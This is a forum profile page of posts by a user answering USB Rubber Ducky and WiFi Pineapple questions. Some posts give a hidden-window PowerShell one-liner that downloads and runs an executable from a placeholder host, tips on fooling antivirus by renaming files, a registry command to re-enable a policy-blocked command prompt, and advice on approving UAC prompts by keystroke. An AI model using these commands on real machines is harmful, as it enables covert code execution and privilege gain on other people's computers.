White Light
-
Posts
67 -
Joined
-
Last visited
-
Days Won
2
Posts posted by White Light
-
-
This was a pretty hot topic a while back (pardon the pun). Seems that the general consensus was that it's normal and completely OK for it to be quite warm, and that passive cooling already in place should be more than sufficient to keep it at safe temperatures.
-
On 5/18/2016 at 8:49 PM, Source_Writer said:
Thanks for your answers.
6. Depends on the destination computer. 30s is a very long time. For me it's generally done in under 10s.
Ok. And the RD script starts after this first installation time I guess yes ? I don't need to set 15 sec delay so ?.
No. The ducky starts to run as soon as it's plugged in, the only problem is that the computer won't respond to the keystrokes until after the driver has loaded. You will need a delay otherwise it'll start part way through.
On 5/18/2016 at 8:49 PM, Source_Writer said:7. That just renames the file, it doesn't "convert" it. Using a different extension like .old may fool some AVs, but don't rely on that.
Ok. It just rename the file so my code above is correct ? STRING $source = "site.com/file.old"; $destination = "%APPDATA%\file.exe"; Invoke-WebRequest $source -OutFile $destination;
I'm just scary now to keep the focus on the hidden powershell windows opened/keep it on the first plan.. I guess there is no solution.
I'm not sure that the destination will function correctly. Variables in powershell are like $this and I don't think the web request will download the file to the correct location. You'll have to use $env:appdata instead.
-
1. Don't change the format of the SD card. It should come standard as FAT32 (I believe) so leave it as that.
2. There's no way to force powershell to stay active, as you've set the windowstyle to hidden.
3. No idea about any special drivers.
4. Stay with GUI r as you are already using.
5. I use the encoder from the rubber ducky github.
6. Depends on the destination computer. 30s is a very long time. For me it's generally done in under 10s.
7. That just renames the file, it doesn't "convert" it. Using a different extension like .old may fool some AVs, but don't rely on that.
8. No, it won't need Java when it is running as a keyboard.
-
That all depends on the restrictions in place. What is important to think of is this: anything YOU can do with a keyboard, the ducky can do as well. If you can't open up the command prompt, neither can the ducky. If the registry editor is blocked for you, so it is for the ducky.
-
You may need to install the drivers first.
-
Do you think I could use [REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f] to edit the registry from powershell even though REGEDIT is disabled?
I honestly couldn't say for sure.
-
Powershell is enabled, when I try [powershell Start-Process cmd -Verb runAs], it opens the cmd prompt and says it's disabled by group policy. Can I use powershell to edit the registry and allow cmd prompt?
Powershell is a more powerful shell (hence the name) so you can basically do everything in it as in CMD, though sometimes requiring a different way.
-
Is powershell disabled by the policy as well? Some people overlook that.
-
To anyone else that had this problem:
your first payload should be named inject.bin, and will execute normally, only when no special keys are activated
the second is named inject2.bin and executes with NUMLOCK
the third is named inject3.bin and executes with CAPSLOCK
hope it helps
Thank you for including your answer after you found your solution. Now anyone with the same issue will see your post and know how to solve it themselves. It always bothers me when people just say "Nevermind, I fixed it" without explaining their solution.
-
Nobody has the right to maintain this project?
Few people feel
You're complaining after <1 hour from your original post? Few people have patience
If you actually looked at the info that was given with your ducky, you'd see you could go to USBRubberDucky.com, and from there find this page to download what you want.
I bought USB-Rubber-DuckyI am a computer idiotBought will not useBut hey, if you're a "computer idiot" and "will not use" the ducky, I'll take it off your hands.
-
Copy-pasted from markdown file, and can't edit.. Hur-durr, my bad. It's still readable at least :)
I think there might be a minimum number of posts required to edit your own posts (kinda weird, right?). The link to edit your post should be right underneath the post itself, next to the Multiquote button, though it's grayed out when you're not hovering over it.
-
Changed 11 hours ago by nbd
- Resolution set to duplicate
- Status changed from reopened to closed
it's being worked on, no need to keep reopening ticket
From their ticketing system.
-
Well ASCII_9 is a literal tab, so the issue is probably the tab you clearly have there instead of a space. In addition, you're going to run into issues with line 13. Try running
echo C:\%userprofile%\Desktop\
in cmd.exe and see what the output is.
-
I tried simulating keystrokes and i didn't work. But the mimikatz is still working, i'm trying to implement it somehow.
The point I was trying to make at the end there is that you should get admin immediately, then you can maintain it easily. Having physical access means that all security measures are basically pointless, all that matters is automating it. In this case, using the ducky to send ALT y while at a UAC prompt will accept it and continue.
-
Are you sure? Because bitsadmin is on win10. Anyway does anyone knows any vb script with privs escalation or uac bypass? Tried google, tried deep web, but found nothing helpful.
I know bitsadmin came with XP SP1 support tools, but I was fairly certain that it only came if you had Pro and not Home (a lot of things weren't available for the Home edition) unless you specifically downloaded it yourself. Past XP it was included by default. Either way, bitsadmin was depreciated when Windows 7 came out in favor of using powershell. As for a UAC bypass using VBS...dude, do you really think it'd be as simple as a bit of code you could just copy and paste from some website? Give MS some credit. If anything like that was released in the wild, it'd be patched in no time. You can't even simulate keystrokes to try to navigate the UAC prompt.
That being said, when you plug in a keyboard you can easily use key presses to approve admin access, and once you have that you can easily maintain it.
-
I was thinking on powershell, but I couldn't find the info which windows os has it installed by default, so I'm using vb just to be sure it'll work.
I believe everything since Vista SP1 has it enabled by default. On the other hand, I believe bitsadmin is supported by even fewer versions.
-
I asked this question a bit earlier and got this response:
Depends on which antenna you want to be stronger. The side with SD card and the vents is WLAN1(Male end). This is the antenna that does recon scanning and enters monitor mode. The other antenna is WLAN0; this handles hosting the APs that clients connect to and also hosts the management network (WLAN0-1).
- 2
-
Definitely an interesting idea. It would make it a lot easier for new users to find code to do what they want, though I still think it's best that they learn how to do it themselves.
-
Because it's all about the speed. In this case you only need 3 seconds and you are done. VB file is small, which means less download time, and less download time means CMD window will be gone in a flash.
You could instead use powershell, which would have maybe 0.2s of visibility on the screen if run with the hidden windowstyle.
(New-Object Net.WebClient).DownloadFile('http://yourhost.com/helpfulexecutable.exe','C:\helper.exe');&'C:\helper.exe'
-
Why download and use the VB script to download the end file when you can just download and execute the file directly?
-
Nice, Thanks Whistle Master.
My Nano is quite hot after a view minute. Is there a generally known working temp (I mean the temperature it has after idk 30 Minutes online, or something.)
I use an wifi-USB-dongle as wlan2 for client mode and run PineAP (more silent area).
How is yours? Is it also hot, or merely warm? Thanks
The pineapple runs very warm, this is normal. I can't remember the exact figures, but even when it's "hot", Darren assured me that it's still well within its operating temperature range and safe to use without active cooling.
- 1
-
You basically just copied the tutorial that is stickied at the top of the forum.
-
What you need to do is flash the firmware with composite duck then you will have both storage and HID features.
-
If it's executing the old script, that means you either didn't copy over the inject.bin file properly, or you didn't create the inject.bin file properly (meaning you created it using the old script, or you accidentally created it in a different location without realizing). If it simply wasn't executing, or started seemingly part-way through, that would mean you need a bigger delay (2000-5000 milliseconds is good).
help with flashing
in Classic USB Rubber Ducky
Posted
They moved from google code over to github like...2 years ago? https://github.com/hak5darren/USB-Rubber-Ducky/